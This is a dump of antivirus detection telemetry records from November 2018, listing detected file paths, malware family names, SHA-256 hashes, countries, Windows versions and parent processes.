  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc6bfb1229f670c8dfd9222478cdfdae1649a19b580b0ce85097826dc8f137d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\DesktopLayer专杀.exe', parentsize=258048, timestamp='2018-11-04T13:36:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMFsrv.exe', parentsize=2396944, timestamp='2018-11-04T16:02:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\Malwarebytes Antimalware\\MalwareBytes Anti-Malware Keygen v1.7 URET\\MalwareBytes Anti-Malware Keygen v1.7 URET.exe', parentsize=575104, timestamp='2018-11-04T15:37:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T22:10:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T21:44:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\3582-490\\\\\\\\DfsdkS.exe\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T16:08:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='turbo_c_downloader_4209712333.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Turbo_C_Downloader_4209712333.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:43:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rmzeztw.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-966121994-3784430241-111158856-1000\\$RMZEZTW.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rzidggu.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-966121994-3784430241-111158856-1000\\$RZIDGGU.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214954-2e8ec270', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214954-2E8EC270', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DigitalRescue4Premium.exe', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134805-97d1e4dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb5c1145\\AVSCAN-20181104-134601-85978A80\\AVSCAN-20181104-134805-97D1E4DD', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190030-547ee398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_402b68c0\\AVSCAN-20181104-190009-503CD412\\AVSCAN-20181104-190030-547EE398', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:00:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mpuxsrv.exe', filepath='C:\\Program Files\\Windows Defender\\MpUXSrv.exe', filesize=320000, name='W32/Infector.Gen8.#M300.#R700734'), hash='bfadcb99e116ad6c9a6280aedd9a7c8bb796116a6f14dd90cabab47dec24821c', metadata=Row(cmdline='--engine=2 --session-id=EMe\\\\\\/mWMDFiGz1TKiBMiv1sPh\\\\\\/hmx2iFYSRiOjQXy --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-04T09:18:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_12c08020.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_12c08020.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_17b8dbe2.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_17b8dbe2.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140331-f9a04c39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140331-F9A04C39', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140302-f4942b5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140302-F4942B5D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BFDD244AC3625CC291BC24B4CCEDF133E2D7F1E5BD676D7335E6E77102C69987', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:12:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215659-7b1c9932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215659-7B1C9932', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='гришанова эх, девочки.exe', filepath='C:\\Documents and Settings\\X\\Рабочий стол\\Гришанова Эх, девочки.exe', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c01494cfee8fb222b05b7269f85a0008d16c893f6e63ae84ba3de83f4aa9f3c0', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130113-020b782a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-125733-6ABDF566\\AVSCAN-20181104-130113-020B782A', filesize=600000, name='HEUR/APC.#M1.#R1'), hash='c01494cfee8fb222b05b7269f85a0008d16c893f6e63ae84ba3de83f4aa9f3c0', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C0232C16D0F27C920C61135B153AB65A121B2B3362D47231660943712472A96D', filesize=2816000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T08:59:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211609-e9a85b8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17bd2441\\AVSCAN-20181104-211430-DE220191\\AVSCAN-20181104-211609-E9A85B8E', filesize=64000, name='JOKE/IconSwap.1.#M1.#R1'), hash='c06a4c4bcde521bfcab8754f09bf9abf95c177ce212296bbecead5a08bf80eb3', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl10f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl10F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18b.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18B.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18a.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18A.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl174.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl174.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl117.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl117.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl11c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl11C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl151.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl151.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl155.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl155.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl173.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl173.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl19f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl19F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl122.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl122.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl129.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl129.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl145.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl145.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a6.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A6.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl158.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl158.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl121.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl121.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl10.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl10.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl197.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl197.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl142.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl142.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl184.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl184.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl191.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl191.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl180.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl180.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl107.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl107.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl15d.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl15D.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
